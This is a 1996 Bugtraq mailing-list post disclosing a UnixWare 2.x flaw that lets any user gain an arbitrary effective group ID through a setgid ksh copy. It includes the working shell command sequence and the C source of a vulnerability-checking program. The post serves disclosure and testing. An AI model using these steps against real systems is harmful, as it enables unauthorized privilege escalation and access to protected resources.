Bugtraq mailing list archives
More on the UnixWare problem
From: tv () pobox com (Todd Vierling)
Date: Fri, 23 Aug 1996 16:11:25 -0400
I'm afraid to do this, but all, here's the source to that binary I posted. Read it and gasp. :( The vendor's been notified but it'll be a while before I see action. I've contacted them; there's a trouble ticket open; I've also just learned that someone has leaked the details and it's flowing around the net already. CRINGE!

You'll note that I took pains to hide the program's function, for good reason. I'd been through the runaround at SCO for some time (I spent more than an hour on hold today alone <yikes>), but finally it was demonstrated to me by the following command sequence by a kind SCO engineer that on UnixWare 2.x (not just 2.0x, but 2.1 as well), the set-group-id privilege can be compromised by *any user*.

% cp /usr/bin/ksh .
% chmod 2700 ./ksh
% chgrp 23456 ./ksh
% ./ksh
id
And 'id' reports effective group ID of 23456. Oh, s**t. Watch out, /dev/kmem. How about mode 775 directories? What, you say /usr/bin comes that way by default, group 'bin'? Someone get me a bottle of Advil. Oh, it's a high-security system? Make that a double--of codeine.

=====
#include <sys/types.h>
#include <sys/stat.h>
#include <stdio.h>
#include <stdlib.h>     /* srandom(), random() */
#include <string.h>
#include <time.h>
#include <unistd.h>

#define KEYMATCH "\x1D\xFC\x3A\x2FMZ"
#define TESTGRP 17186

int main(int argc, char **argv)
{
    struct stat st, *s = &st;
    pid_t p;

    /* Second pass: we were re-exec'd by ourselves with the secret argument,
     * so just report whether the setgid bit handed us TESTGRP. */
    if (argc == 2 && !strcmp(argv[1], KEYMATCH)) {
        if (getegid() == TESTGRP) {
            unsigned long r;
            srandom(time(NULL));
            r = (unsigned long)random();
            /* Scramble byte 1 from bytes 3, 2 and 0 (parentheses added: the
             * original shifted the masks instead of the masked values). */
            r = (r & 0xFFFF00FF) | (((r & 0xFF000000) >> 16)
                                    ^ ((r & 0x00FF0000) >> 8)
                                    ^ ((r & 0x000000FF) << 8));
            fprintf(stderr, "%s: system vulnerable code 0x%lX\n", argv[0], r);
        } else {
            fprintf(stderr, "%s: system not vulnerable\n", argv[0]);
        }
        return 0;
    }

    if (argc > 1) {
        fprintf(stderr, "%s: don't supply any arguments\n", argv[0]);
        return 0;
    }
    if (!strchr(argv[0], '/')) {
        fprintf(stderr, "%s: user error: run me with a pathname, not in $PATH\n", argv[0]);
        return 0;
    }
    if (stat(argv[0], s)) {
        fprintf(stderr, "%s: system error: cannot stat my binary?\n", argv[0]);
        return 0;
    }
    if (s->st_uid != geteuid() && s->st_uid != getuid()) {
        fprintf(stderr, "%s: user error: does this uid own my binary?\n", argv[0]);
        return 0;
    }

    /* The test itself: chgrp our own binary to a group we are not in, then
     * set the setgid bit.  A conforming kernel refuses one or the other. */
    chown(argv[0], (uid_t)-1, TESTGRP);
    if (chmod(argv[0], 02700)) {
        chown(argv[0], (uid_t)-1, s->st_gid);
        chmod(argv[0], s->st_mode & 07777);
        fprintf(stderr, "%s: user error: cannot chmod my own binary?\n", argv[0]);
        return 0;
    }

    /* vfork() suspends us until the child execs; the re-exec'd copy does the
     * getegid() check while we restore the original group and mode. */
    if ((p = vfork()) == -1) {
        fprintf(stderr, "%s: system error: cannot fork\n", argv[0]);
        return 0;
    }
    if (!p) {
        execl(argv[0], argv[0], KEYMATCH, (char *)NULL);
        fprintf(stderr, "%s: system error: cannot exec\n", argv[0]);
        _exit(0);
    }
    chown(argv[0], (uid_t)-1, s->st_gid);
    chmod(argv[0], s->st_mode & 07777);
    return 0;
}
=====

== Todd Vierling (Personal tv () pobox com; Business tv () iag net) Cast a vote! ==
== System administrator/technician, Internet Access Group, Orlando Florida ==
== Dialups in Orange, Volusia, Lake, Osceola counties - http://www.iag.net ==